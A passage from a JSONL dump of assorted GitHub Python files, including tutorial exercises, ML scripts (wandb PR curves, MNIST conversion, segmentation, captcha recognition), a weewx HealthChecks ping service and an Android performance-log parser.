hello import *\nhello(text) #we can't use module's name (hello.hello() etc.)\nnewfunction(text2)\n\n#if we have 2 function (the same name):\nfrom hello import hello as hello_hello\ntext3 = input(\"Text3 = \")\ndef hello(text3):\n print(text3)\n\nhello(text3)\nhello_hello(text)\n\n#module builtins\nimport math\nprint(math.cos(60))\n\nimport random\nx = random.randrange(1,100)\nprint(x) #print random number","repo_name":"martafrak/Python_Course","sub_path":"9. module/9. module.py","file_name":"9. 
module.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26407717530","text":"# Reference:\n# https://github.com/Qiskit/qiskit-community-tutorials/blob/master/hello_world/hello_zero.ipynb\n# https://delapuente.github.io/qiskit-textbook\n\nfrom qiskit import (IBMQ, providers, Aer, execute)\nfrom qiskit.tools.visualization import plot_bloch_multivector\nfrom qiskit.visualization import plot_histogram\nimport matplotlib.pyplot as plt\n\ndef fetchBackend() :\n # IBM Q backend\n IBMQ.load_accounts()\n backend = providers.ibmq.least_busy(IBMQ.backends(simulator = False))\n print(\"Using the least busy device:\", backend.name())\n return backend\n\ndef qexec(circuit, backend = None, shots = 1000) :\n if backend is None :\n backend = defaultBackend\n # Execute the circuit on the qasm backend\n job = execute(circuit, backend, shots = shots)\n # Grab results from the job\n result = job.result()\n # Print\n print_result(circuit, result)\n # Draw\n draw_result(circuit, result)\n\ndef print_result(circuit, result) :\n print(circuit)\n print(\"Counts :\", result.get_counts(circuit))\n # print(\"State vectors:\", result.get_statevector())\n\ndef draw_result(circuit, result) :\n circuit.draw(output = \"mpl\")\n plot_histogram(result.get_counts(circuit))\n # plot_bloch_multivector(result.get_statevector())\n\n# List IBMQ backends\n# provider = IBMQ.get_provider(hub='ibm-q')\n# provider.backends()\n\n# List simulators\n# unitary_simulator\n# statevector_simulator\n# qasm_simulator\nprint(Aer.backends())\n\ndefaultBackend = Aer.get_backend(\"qasm_simulator\")\nprint(\"Default backend:\", defaultBackend.name())\n","repo_name":"neocarton/demo-quantum-hello","sub_path":"qcomp.py","file_name":"qcomp.py","file_ext":"py","file_size_in_byte":1547,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8396147341","text":"import wandb\nfrom wandb import util\nfrom wandb.plots.utils import test_missing, test_types\n\n\ndef pr_curve(\n y_true=None,\n y_probas=None,\n labels=None,\n classes_to_plot=None,\n interp_size=21,\n title=None,\n):\n \"\"\"Compute the tradeoff between precision and recall for different thresholds.\n\n A high area under the curve represents both high recall and high precision, where\n high precision relates to a low false positive rate, and high recall relates to a\n low false negative rate. High scores for both show that the classifier is returning\n accurate results (high precision), and returning a majority of all positive results\n (high recall). PR curve is useful when the classes are very imbalanced.\n\n Arguments:\n y_true (arr): true sparse labels y_probas (arr): Target scores, can either be\n probability estimates, confidence values, or non-thresholded measure of\n decisions. shape: (*y_true.shape, num_classes)\n labels (list): Named labels for target variable (y). Makes plots easier to read\n by replacing target values with corresponding index. For example labels =\n ['dog', 'cat', 'owl'] all 0s are replaced by 'dog', 1s by 'cat'.\n classes_to_plot (list): unique values of y_true to include in the plot\n interp_size (int): the recall values will be fixed to `interp_size` points\n uniform on [0, 1] and the precision will be interpolated for these recall\n values.\n\n Returns:\n Nothing. 
To see plots, go to your W&B run page then expand the 'media' tab under\n 'auto visualizations'.\n\n Example:\n ```\n wandb.log({\"pr-curve\": wandb.plot.pr_curve(y_true, y_probas, labels)})\n ```\n \"\"\"\n np = util.get_module(\n \"numpy\",\n required=\"roc requires the numpy library, install with `pip install numpy`\",\n )\n pd = util.get_module(\n \"pandas\",\n required=\"roc requires the pandas library, install with `pip install pandas`\",\n )\n sklearn_metrics = util.get_module(\n \"sklearn.metrics\",\n \"roc requires the scikit library, install with `pip install scikit-learn`\",\n )\n sklearn_utils = util.get_module(\n \"sklearn.utils\",\n \"roc requires the scikit library, install with `pip install scikit-learn`\",\n )\n\n def _step(x):\n y = np.array(x)\n for i in range(1, len(y)):\n y[i] = max(y[i], y[i - 1])\n return y\n\n y_true = np.array(y_true)\n y_probas = np.array(y_probas)\n\n if not test_missing(y_true=y_true, y_probas=y_probas):\n return\n if not test_types(y_true=y_true, y_probas=y_probas):\n return\n\n classes = np.unique(y_true)\n if classes_to_plot is None:\n classes_to_plot = classes\n\n precision = dict()\n interp_recall = np.linspace(0, 1, interp_size)[::-1]\n indices_to_plot = np.where(np.isin(classes, classes_to_plot))[0]\n for i in indices_to_plot:\n if labels is not None and (\n isinstance(classes[i], int) or isinstance(classes[0], np.integer)\n ):\n class_label = labels[classes[i]]\n else:\n class_label = classes[i]\n\n cur_precision, cur_recall, _ = sklearn_metrics.precision_recall_curve(\n y_true, y_probas[:, i], pos_label=classes[i]\n )\n # smooth the precision (monotonically increasing)\n cur_precision = _step(cur_precision)\n\n # reverse order so that recall in ascending\n cur_precision = cur_precision[::-1]\n cur_recall = cur_recall[::-1]\n indices = np.searchsorted(cur_recall, interp_recall, side=\"left\")\n precision[class_label] = cur_precision[indices]\n\n df = pd.DataFrame(\n {\n \"class\": np.hstack([[k] * len(v) for k, v in precision.items()]),\n \"precision\": np.hstack(list(precision.values())),\n \"recall\": np.tile(interp_recall, len(precision)),\n }\n )\n df = df.round(3)\n\n if len(df) > wandb.Table.MAX_ROWS:\n wandb.termwarn(\n \"wandb uses only %d data points to create the plots.\" % wandb.Table.MAX_ROWS\n )\n # different sampling could be applied, possibly to ensure endpoints are kept\n df = sklearn_utils.resample(\n df,\n replace=False,\n n_samples=wandb.Table.MAX_ROWS,\n random_state=42,\n stratify=df[\"class\"],\n ).sort_values([\"precision\", \"recall\", \"class\"])\n\n table = wandb.Table(dataframe=df)\n title = title or \"Precision v. 
Recall\"\n return wandb.plot_table(\n \"wandb/area-under-curve/v0\",\n table,\n {\"x\": \"recall\", \"y\": \"precision\", \"class\": \"class\"},\n {\"title\": title},\n )\n","repo_name":"wandb/wandb","sub_path":"wandb/plot/pr_curve.py","file_name":"pr_curve.py","file_ext":"py","file_size_in_byte":4716,"program_lang":"python","lang":"en","doc_type":"code","stars":7479,"dataset":"github-code","pt":"37"} +{"seq_id":"23597046815","text":"# -*- coding: utf-8 -*-\r\n\r\nimport pymongo\r\n\r\nclass MongoDBOutput(object): \r\n\r\n def __init__(self, db_name, collection_name):\r\n self.client = pymongo.MongoClient(\"localhost\", 27017)\r\n self.db = self.client[db_name]\r\n self.collection = self.client.db[collection_name]\r\n def insert_to_mongo(self, data):\r\n if data is None:\r\n return\r\n self.collection.insert(data) \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"BensonBair/Taifex-Web-Scraping-to-MongoDB","sub_path":"crawler_oop/MongoDBOutput.py","file_name":"MongoDBOutput.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42034998150","text":"Math = []\nDBMS = []\nDSA = []\ntotal = []\npercentage = []\navg = []\n\nfor i in range(3):\n print(\"\\t\\t\\t For Student:\", i+1)\n Math.append(int(input(\"Enter Your Maths Marks: \")))\n DBMS.append(int(input(\"Enter Your DBMS Marks: \")))\n DSA.append(int(input(\"Enter Your DSA Marks: \")))\n total_marks = Math[i] + DBMS[i] + DSA[i]\n total.append(total_marks)\n avg_marks = total_marks / 3\n avg.append(avg_marks)\n percent = (total_marks / 300) * 100\n percentage.append(percent)\n\nfor j in range(3):\n print(f\"Student:{j+1} Maths Marks:\", Math[j], \"DBMS:\", DBMS[j], \"DSA:\", DSA[j], \"Total Marks:\", total[j],\n \"Average Marks:\", avg[j], \"Percentage:\", percentage[j])\n","repo_name":"M-Rohail/Python_Concepts","sub_path":"Lecture 1 task.py","file_name":"Lecture 1 task.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29037238258","text":"from student import Student\nfrom student import Department\nfrom student import Course\n\nstudent_1 = Student(\"John Rambo\", 1)\n\ndepartment_1 = Department(\"IT\", 2)\ndepartment_2 = Department(\"Marketing\", 3)\ndepartment_3 = Department(\"Sales\", 4)\n\ncourse_1 = Course(\"DevOps\", 3, department_1)\ncourse_2 = Course(\"Python\", 4, department_1)\ncourse_3 = Course(\"SEO\", 5, department_2)\ncourse_4 = Course(\"CRM - SalesForce\", 6, department_3)\n\n","repo_name":"meg991/OOP","sub_path":"Structured/main_firstpat.py","file_name":"main_firstpat.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24389474998","text":"# -*- coding: utf-8 -*-\nimport os\nimport struct\n\nimport cv2\nimport numpy as np\n\n\nclass DataUtils(object):\n\n def __init__(self, filename=None, outpath=None):\n self._filename = filename\n self._outpath = outpath\n\n self._tag = '>' # 大端格式\n self._twoBytes = 'II'\n self._fourBytes = 'IIII'\n self._pictureBytes = '784B'\n self._labelByte = '1B'\n self._twoBytes2 = self._tag + self._twoBytes\n self._fourBytes2 = self._tag + self._fourBytes\n self._pictureBytes2 = self._tag + self._pictureBytes\n self._labelByte2 = self._tag + self._labelByte\n\n self._imgNums = 0\n self._LabelNums = 0\n\n def 
getImage(self):\n \"\"\"\n Convert the MNIST image binary file into pixel feature data\n \"\"\"\n binfile = open(self._filename, 'rb') # open the file in binary mode\n buf = binfile.read()\n binfile.close()\n index = 0\n numMagic, self._imgNums, numRows, numCols = struct.unpack_from(self._fourBytes2, buf, index)\n index += struct.calcsize(self._fourBytes2)\n images = []\n print('image nums: %d' % self._imgNums)\n for i in range(self._imgNums):\n imgVal = struct.unpack_from(self._pictureBytes2, buf, index)\n index += struct.calcsize(self._pictureBytes2)\n imgVal = list(imgVal)\n images.append(imgVal)\n return np.array(images), self._imgNums\n\n def getLabel(self):\n \"\"\"\n Convert the MNIST label binary file into the corresponding numeric label features\n \"\"\"\n binFile = open(self._filename, 'rb')\n buf = binFile.read()\n binFile.close()\n index = 0\n magic, self._LabelNums = struct.unpack_from(self._twoBytes2, buf, index)\n index += struct.calcsize(self._twoBytes2)\n labels = []\n for x in range(self._LabelNums):\n im = struct.unpack_from(self._labelByte2, buf, index)\n index += struct.calcsize(self._labelByte2)\n labels.append(im[0])\n return np.array(labels)\n\n def outImg(self, arrX, arrY, imgNums):\n \"\"\"\n Write the images out from the generated features and numeric labels\n \"\"\"\n output_txt = self._outpath + '/img.txt'\n output_file = open(output_txt, 'a+')\n\n m, n = np.shape(arrX)\n # each image is 28*28 = 784 bytes\n for i in range(imgNums):\n img = np.array(arrX[i])\n img = img.reshape(28, 28)\n # print(img)\n outfile = str(i) + \"_\" + str(arrY[i]) + \".bmp\"\n # print('saving file: %s' % outfile)\n\n txt_line = outfile + \" \" + str(arrY[i]) + '\\n'\n output_file.write(txt_line)\n cv2.imwrite(self._outpath + '/' + outfile, img)\n output_file.close()\n\n\nif __name__ == '__main__':\n # original MNIST files\n trainfile_X = './mnist/raw/train-images.idx3-ubyte'\n trainfile_y = './mnist/raw/train-labels.idx1-ubyte'\n testfile_X = './mnist/raw/t10k-images.idx3-ubyte'\n testfile_y = './mnist/raw/t10k-labels.idx1-ubyte'\n\n # load the MNIST dataset\n train_X, train_img_nums = DataUtils(filename=trainfile_X).getImage()\n train_y = DataUtils(filename=trainfile_y).getLabel()\n test_X, test_img_nums = DataUtils(testfile_X).getImage()\n test_y = DataUtils(testfile_y).getLabel()\n\n # save the converted images to local files\n path_trainset = './mnist/train'\n path_testset = './mnist/test'\n if not os.path.exists(path_trainset):\n os.mkdir(path_trainset)\n if not os.path.exists(path_testset):\n os.mkdir(path_testset)\n DataUtils(outpath=path_trainset).outImg(train_X, train_y, int(train_img_nums / 10)) # /10 converts only a tenth of the set, for testing\n DataUtils(outpath=path_testset).outImg(test_X, test_y, int(test_img_nums / 10))\n","repo_name":"mmdjiji/pytorch-learning","sub_path":"codes/mnist2bmp.py","file_name":"mnist2bmp.py","file_ext":"py","file_size_in_byte":3487,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39466430124","text":"\"\"\"\r\nhttps://debuggercafe.com/instance-segmentation-with-pytorch-and-mask-r-cnn/\r\nhttps://pytorch.org/vision/stable/models.html#object-detection-instance-segmentation-and-person-keypoint-detection\r\n\"\"\"\r\n\r\nimport torch\r\nfrom PIL import Image\r\nfrom torchvision import models, transforms\r\nimport numpy as np\r\nimport cv2\r\n\r\n\r\nclass SemanticSegmentaion(object):\r\n def __init__(self):\r\n self.device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\r\n self.img_transforms = transforms.Compose([\r\n transforms.ToTensor(),\r\n ])\r\n self.model = models.segmentation.deeplabv3_resnet50(pretrained=True)\r\n self.model.to(self.device)\r\n self.model.eval()\r\n self.coco_classes_list = 
['__background__', 'aeroplane', 'bicycle', 'bird', 'boat', 'bottle', 'bus',\r\n 'car', 'cat', 'chair', 'cow', 'diningtable', 'dog', 'horse', 'motorbike',\r\n 'person', 'pottedplant', 'sheep', 'sofa', 'train', 'tvmonitor']\r\n palette = torch.tensor([2 ** 25 - 1, 2 ** 15 - 1, 2 ** 21 - 1])\r\n colors = torch.as_tensor([i for i in range(21)])[:, None] * palette\r\n self.colors = (colors % 255).numpy().astype(\"uint8\")\r\n\r\n def predict_numpy(self, image):\r\n return self._predict_numpy(image)\r\n\r\n def _predict_numpy(self, image):\r\n image = Image.fromarray(image)\r\n image_tensor = self.img_transforms(image)\r\n image_tensor = image_tensor.unsqueeze(0)\r\n image_tensor = image_tensor.to(self.device)\r\n with torch.no_grad():\r\n output = self.model(image_tensor)\r\n output = torch.argmax(output['out'].squeeze(0), dim=0).cpu().numpy().astype(np.uint8)\r\n output = cv2.cvtColor(output, cv2.COLOR_GRAY2RGB)\r\n for idx, coco_class in enumerate(self.coco_classes_list):\r\n if idx == 0:\r\n continue\r\n output = np.where(output==(idx, idx, idx), self.colors[idx], output).astype(np.uint8)\r\n return output\r\n\r\n\r\nif __name__ == \"__main__\":\r\n image_path = 'test.jpg'\r\n kjn = SemanticSegmentaion()\r\n image = cv2.imread(image_path)\r\n output = kjn.predict_numpy(image)\r\n output = cv2.addWeighted(image,0.5,output,0.5,0)\r\n cv2.imshow(\"dupa.jpg\", output)\r\n cv2.waitKey(0)\r\n","repo_name":"kornellewy/youtube-collection","sub_path":"czym_jest_segmentacja_oraz_jak_jej_używać/semantic_seg.py","file_name":"semantic_seg.py","file_ext":"py","file_size_in_byte":2302,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"11198430537","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\n-------------------------------------------------\r\n   File Name:     predict_test\r\n   Description :\r\n   Author :       DrZ\r\n   date:          2019/1/3\r\n-------------------------------------------------\r\n   Change Activity:\r\n                   2019/1/3:\r\n-------------------------------------------------\r\n\"\"\"\r\nimport tensorflow as tf\r\nimport tensorflow.contrib.slim.nets as nets\r\nfrom PIL import Image\r\nimport os\r\nimport numpy as np\r\n\r\n\r\n# convert a class-index vector into a label string\r\ndef vec2name(vec):\r\n name = []\r\n for i in vec:\r\n a = chr(i + 97)\r\n name.append(a)\r\n return \"\".join(name)\r\n\r\n\r\nmodel_dir = r'F:\\resnet_for_captcha\\3train\\model\\train.model-140000'\r\nx = tf.placeholder(tf.float32, [None, 224, 224, 3])\r\n\r\npred, end_points = nets.resnet_v2.resnet_v2_50(x, num_classes=6 * 26, is_training=True)\r\npredict = tf.reshape(pred, [-1, 6, 26])\r\nmax_idx_p = tf.argmax(predict, 2)\r\nsaver = tf.train.Saver()\r\nwith tf.Session() as sess:\r\n sess.run(tf.global_variables_initializer())\r\n saver.restore(sess, model_dir)\r\n test_dir = r'F:\\resnet_for_captcha\\test'\r\n for pic in os.listdir(test_dir):\r\n pic_path = os.path.join(test_dir, pic)\r\n img = Image.open(pic_path)\r\n arr = np.array(img) * 255\r\n im = Image.fromarray(arr)\r\n im = im.resize((224, 224))\r\n arr = np.array(im)\r\n xx = np.zeros([224, 224, 3])\r\n for ii in range(224):\r\n for jj in range(224):\r\n xx[ii, jj, :] = arr[ii, jj]\r\n img1 = Image.fromarray(xx.astype('uint8'))\r\n img2 = tf.reshape(img1, [1, 224, 224, 3])\r\n img3 = tf.cast(img2, tf.float32) / 255.0\r\n\r\n name = os.path.splitext(pic)[0]\r\n\r\n b_image = sess.run(img3)\r\n t_label = sess.run(max_idx_p, feed_dict={x: b_image})\r\n vec = t_label[0].tolist()\r\n predict_text = vec2name(vec)\r\n print('Ground truth: {}  Predicted: {}'.format(name, 
predict_text))","repo_name":"finthon/ResNet-for-captcha","sub_path":"4predict/predict_test.py","file_name":"predict_test.py","file_ext":"py","file_size_in_byte":1956,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"37"} +{"seq_id":"74684238826","text":"#ASHITA GOYAL (11) SEC - A1\r\n\r\ndef insertionSort(arr): \r\n \r\n for i in range(1, len(arr)): \r\n \r\n key = arr[i] \r\n \r\n j = i-1\r\n while j >=0 and key < arr[j] : \r\n arr[j+1] = arr[j] \r\n j -= 1\r\n arr[j+1] = key\r\n\r\nl = list(map(int, input(\"ENTER THE LIST TO BE SORTED: \").split()))\r\ninsertionSort(l)\r\nprint(\"SORTED LIST: \", l)\r\n\r\n#Time - Complexity : O(n^2)\r\n","repo_name":"ashita1910/DAA_Assignments","sub_path":"InsertionSort.py","file_name":"InsertionSort.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72204286827","text":"import socket\nimport threading\n\ntry:\n # Python 3\n from urllib.request import urlopen\nexcept ImportError:\n # Python 2\n from urllib2 import urlopen\n\nimport weewx\nfrom weewx.engine import StdService\nfrom weewx.reportengine import ReportGenerator\n\nfrom weeutil.weeutil import to_bool, to_int\n\nVERSION = \"0.1\"\n\ntry:\n # Test for new-style weewx logging by trying to import weeutil.logger\n import weeutil.logger\n import logging\n log = logging.getLogger(__name__) # confirm to standards pylint: disable=invalid-name\n def setup_logging(logging_level, config_dict):\n \"\"\" Setup logging for running in standalone mode.\"\"\"\n if logging_level:\n weewx.debug = logging_level\n\n weeutil.logger.setup('wee_HealthChecks', config_dict)\n\n def logdbg(msg):\n \"\"\" Log debug level. \"\"\"\n log.debug(msg)\n\n def loginf(msg):\n \"\"\" Log informational level. \"\"\"\n log.info(msg)\n\n def logerr(msg):\n \"\"\" Log error level. \"\"\"\n log.error(msg)\n\nexcept ImportError:\n # Old-style weewx logging\n import syslog\n\n def logmsg(level, msg):\n \"\"\" Log the message at the designated level. \"\"\"\n syslog.syslog(level, 'wee_HealthChecks: %s:' % msg)\n\n def logdbg(msg):\n \"\"\" Log debug level. \"\"\"\n logmsg(syslog.LOG_DEBUG, msg)\n\n def loginf(msg):\n \"\"\" Log informational level. \"\"\"\n logmsg(syslog.LOG_INFO, msg)\n\n def logerr(msg):\n \"\"\" Log error level. \"\"\"\n logmsg(syslog.LOG_ERR, msg)\n\ndef send_ping(host, uuid, timeout, ping_type=None):\n \"\"\"Send the HealthChecks 'ping'.\"\"\"\n if ping_type:\n url = \"https://%s/%s/%s\" %(host, uuid, ping_type)\n else:\n url = \"https://%s/%s\" %(host, uuid)\n\n try:\n urlopen(url, timeout=timeout)\n except socket.error as exception:\n logerr(\"Ping failed: %s\" % exception)\n\nclass HealthChecksService(StdService):\n \"\"\" A service to ping a healthchecks server.. 
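For example, illustrative use of the module-level send_ping helper defined above; the UUID is
a placeholder for a check created on your HealthChecks instance:

    CHECK_UUID = "00000000-0000-0000-0000-000000000000"  # placeholder
    send_ping("hc-ping.com", CHECK_UUID, 10)             # GET https://hc-ping.com/<uuid>
    send_ping("hc-ping.com", CHECK_UUID, 10, "fail")     # GET https://hc-ping.com/<uuid>/fail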
\"\"\"\n def __init__(self, engine, config_dict):\n super(HealthChecksService, self).__init__(engine, config_dict)\n\n # service_dict = config_dict.get('HealthChecks', {})\n skin_dict = self.config_dict.get('StdReport', {}).get('HealthChecks', {})\n\n self.enable = to_bool(skin_dict.get('enable', True))\n if not self.enable:\n loginf(\"Not enabled, exiting.\")\n return\n\n self.host = skin_dict.get('host', 'hc-ping.com')\n self.timeout = to_int(skin_dict.get('timeout', 10))\n self.uuid = skin_dict.get('uuid')\n if not self.uuid:\n raise ValueError(\"uuid option is required.\")\n\n send_ping(self.host, self.uuid, self.timeout, \"start\")\n\n # possible option to run as a service only\n # self.bind(weewx.NEW_ARCHIVE_RECORD, self.new_archive_record)\n # self._thread = HealthChecksServiceThread(self.host, self.uuid, self.timeout)\n # self._thread.start()\n\n def new_archive_record(self, event):\n \"\"\"The new archive record event.\"\"\"\n self._thread.threading_event.set()\n\n def shutDown(self):\n \"\"\"Run when an engine shutdown is requested.\"\"\"\n loginf(\"SHUTDOWN - initiated\")\n\n send_ping(self.host, self.uuid, self.timeout, \"fail\")\n loginf(\"fail ping sent\")\n\n if self._thread:\n loginf(\"SHUTDOWN - thread initiated\")\n self._thread.running = False\n self._thread.threading_event.set()\n self._thread.join(20.0)\n if self._thread.is_alive():\n logerr(\"Unable to shut down %s thread\" %self._thread.name)\n\n self._thread = None\n\nclass HealthChecksServiceThread(threading.Thread):\n \"\"\"A service to send 'pings' to a HealthChecks server. \"\"\"\n def __init__(self, host, uuid, timeout):\n threading.Thread.__init__(self)\n\n self.running = False\n\n self.host = host\n self.uuid = uuid\n self.timeout = timeout\n\n self.threading_event = threading.Event()\n\n def run(self):\n self.running = True\n\n while self.running:\n self.threading_event.wait()\n send_ping(self.host, self.uuid, self.timeout)\n self.threading_event.clear()\n\n loginf(\"exited loop\")\n\nclass HealthChecksGenerator(ReportGenerator):\n \"\"\"Class for managing the healthchecks generator.\"\"\"\n def __init__(self, config_dict, skin_dict, *args, **kwargs):\n \"\"\"Initialize an instance of HealthChecksGenerator\"\"\"\n weewx.reportengine.ReportGenerator.__init__(self, config_dict, skin_dict, *args, **kwargs)\n\n self.host = skin_dict.get('host', 'hc-ping.com')\n self.timeout = to_int(skin_dict.get('timeout', 10))\n self.uuid = skin_dict.get('uuid')\n if not self.uuid:\n raise ValueError(\"uuid option is required.\")\n\n def run(self):\n send_ping(self.host, self.uuid, self.timeout)\n\nif __name__ == \"__main__\":\n pass\n","repo_name":"bellrichm/WeeWX-Extras","sub_path":"bin/user/healthchecks.py","file_name":"healthchecks.py","file_ext":"py","file_size_in_byte":4909,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16729046322","text":"import gym\nimport gymtorch\nsim=1\nnum_envs=50\nactors_per_env=200\n\n# lignes pour regarder toutes les pos,ori,vit,vit_ang, à faire un fois, avant que la sim commence\n_root_tensor = gym.acquire_actor_root_state_tensor(sim)\nroot_tensor = gymtorch.wrap_tensor(_root_tensor) # wrap it to acces the data\n# mettre une vue : vecteur d'environements\nroot_states_vec = root_tensor.view(num_envs,actors_per_env,13)\nroot_positions = root_states_vec[..., 0:3]\nroot_orientations = root_states_vec[..., 3:7]\nroot_linvels = root_states_vec[..., 7:10]\nroot_angvels = root_states_vec[..., 10:13]\n\n# pour update ( dans la boucle de 
simulation loop ) call this ( place it after gym.simulate(sim) )\ngym.refresh_actor_root_state(sim)\n\n# to modify, call this after changing the _root_tensor tensor from above:\ngym.set_actor_root_state_tensor(sim,_root_tensor)\n\n# APPLYING CONTROLS\n\n","repo_name":"seanmoyal/testIsaac","sub_path":"Isaac/decompo_tensors.py","file_name":"decompo_tensors.py","file_ext":"py","file_size_in_byte":858,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33960406225","text":"import numpy\nimport pickle\nfrom lib.utils import *\n\n\n\nclass Parser:\n def __init__(self, log_directory, device, build):\n self.log_directory = log_directory\n self.device = device\n self.build = build\n\n def collect_report(self):\n report_filename = self.log_directory + \"/\" + Config().reportFilename\n obj = [self.device, self.build, self.mem_log_parser(), self.cpu_log_parser(), self.bty_usage_log_parser(),\n self.bty_temp_log_parser(), self.data_log_parser(), self.events_parser()]\n output = open(report_filename, 'wb')\n pickle.dump(obj, output, 2)\n\n def mem_log_parser(self):\n mem_filename = self.log_directory + \"/\" + Config().memFilename\n infile = open(mem_filename).readlines()\n num_lines = len(infile)\n mem_list = []\n time_list = []\n i = 0\n while i < num_lines:\n i += 1\n mem = 0\n mem_time = 0\n while i < num_lines and '---' not in infile[i]:\n if 'MemFree:' in infile[i]:\n mem = int(infile[i].split()[-2])/1024\n if 'Time pass:' in infile[i]:\n mem_time = int(infile[i].split()[-2])\n i += 1\n mem_list.append(mem)\n time_list.append(mem_time)\n report = [mem_list, time_list, max(mem_list), min(mem_list), numpy.average(mem_list)]\n\n return report\n\n def cpu_log_parser(self):\n cpu_filename = self.log_directory + \"/\" + Config().cpuFilename\n infile = open(cpu_filename).readlines()\n num_lines = len(infile)\n cpu_list = []\n time_list = []\n i = 0\n while i < num_lines:\n i += 1\n cpu_value = 0\n cpu_time = 0\n while i < num_lines and '---' not in infile[i]:\n if Config().package in infile[i]:\n if float(infile[i].split()[2].strip('%')) <100:\n cpu_value = float(infile[i].split()[2].strip('%'))\n elif i==0:\n cpu_value = 0\n else:\n cpu_value = cpu_list[len(cpu_list)-1]\n if 'Time pass:' in infile[i]:\n cpu_time = int(infile[i].split()[-2])\n i += 1\n time_list.append(cpu_time)\n cpu_list.append(cpu_value)\n max_cpu = max(cpu_list)\n min_cpu = min(cpu_list)\n median_cpu = numpy.average(cpu_list)\n\n report = [cpu_list, time_list, max_cpu, min_cpu, median_cpu]\n return report\n\n def bty_usage_log_parser(self):\n bty_log_filename = self.log_directory + \"/\" + Config().btyFilename\n bty_level_list = []\n time_list = []\n infile = open(bty_log_filename).readlines()\n num_lines = len(infile)\n i = 0\n while i < num_lines:\n bty_level = -1\n i += 1\n btr_time = 0\n while i < num_lines and '---' not in infile[i]:\n if 'level:' in infile[i]:\n bty_level = int(infile[i].strip().split()[-1])\n if 'Time pass:' in infile[i]:\n btr_time = int(infile[i].split()[-2])\n i += 1\n bty_level_list.append(bty_level)\n time_list.append(btr_time)\n max_bat = max(bty_level_list)\n min_bat = min(bty_level_list)\n diff_bat = (max_bat - min_bat)\n report = [bty_level_list, time_list, max_bat, min_bat, diff_bat]\n return report\n\n def bty_temp_log_parser(self):\n bty_log_filename = self.log_directory + \"/\" + Config().btyFilename\n bty_tmpt_list = []\n time_list = []\n infile = open(bty_log_filename).readlines()\n num_lines = len(infile)\n i = 0\n while i < num_lines:\n 
bty_temp = -1\n i += 1\n btr_time = 0\n while i < num_lines and '---' not in infile[i]:\n if 'temperature:' in infile[i]:\n bty_temp = int(infile[i].strip().split()[-1])\n if 'Time pass:' in infile[i]:\n btr_time = int(infile[i].split()[-2])\n i += 1\n bty_tmpt_list.append(bty_temp)\n time_list.append(btr_time)\n max_temp = max(bty_tmpt_list)\n min_temp = min(bty_tmpt_list)\n diff_temp = (max_temp - min_temp)\n\n report = [bty_tmpt_list, time_list, max_temp, min_temp, diff_temp]\n return report\n\n def data_log_parser(self):\n data_log_filename = self.log_directory + \"/\" + Config().dtuFilename\n background_rx = []\n background_tx = []\n foreground_rx = []\n foreground_tx = []\n time_list = []\n infile = open(data_log_filename).readlines()\n num_lines = len(infile)\n i = 0\n while i < num_lines:\n while i < num_lines and '---' not in infile[i]:\n i += 1\n if i >= num_lines:\n break\n i += 1\n background_rx_mbbytes = - 0.1\n background_tx_mbbytes = - 0.1\n foreground_rx_mbbytes = - 1\n foreground_tx_mbbytes = - 1\n\n while i < num_lines and '---' not in infile[i]:\n if 'background_rx_bytes' in infile[i]:\n background_rx_mbbytes = int(infile[i].split(\"=\")[-1].strip())/1024/1024\n if 'background_tx_bytes' in infile[i]:\n background_tx_mbbytes = int(infile[i].split(\"=\")[-1].strip())/1024/1024\n if 'foreground_rx_bytes' in infile[i]:\n foreground_rx_mbbytes = int(infile[i].split(\"=\")[-1].strip())/1024/1024\n if 'foreground_tx_bytes' in infile[i]:\n foreground_tx_mbbytes = int(infile[i].split(\"=\")[-1].strip())/1024/1024\n if 'Time pass:' in infile[i]:\n times = int(infile[i].split()[-2])\n i += 1\n\n background_rx.append(background_rx_mbbytes)\n background_tx.append(background_tx_mbbytes)\n foreground_rx.append(foreground_rx_mbbytes)\n foreground_tx.append(foreground_tx_mbbytes)\n time_list.append(times)\n data = [background_rx, background_tx, foreground_rx, foreground_tx]\n report = [data, time_list]\n\n return report\n\n def events_parser(self):\n events_dir_path = Folders().events_folders_creation(self.log_directory)\n\n for event_name in Config().events_list:\n\n log_captured = events_dir_path+\"/log_captured.txt\"\n os.system(\"grep -i \\\"\"+event_name+\"\\\" \"+self.log_directory+\"/*\"+\"com.verizon\"+\"* > \" + log_captured)\n\n results_file = events_dir_path+\"/\"+event_name+\".txt\"\n output = open(results_file, \"w\")\n n = 0\n for line in open(log_captured):\n if len(line) > 2:\n n+=1\n str1 = line[line.find(event_name):line.find(event_name)+len(event_name)]\n line = line.split()\n epoch = line[2]\n local_time = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(float(epoch)))\n output.write(\" epoch=\"+epoch+\" ---> Local time = \"+local_time+\" \"+str1+\" \"+str(n))\n output.write(\"\\n\")\n output.write(\"===========================================================================\\n\")\n output.close()\n os.system(\"rm \"+log_captured)\n # print(event_name + \" - \" + str(n))\n\n 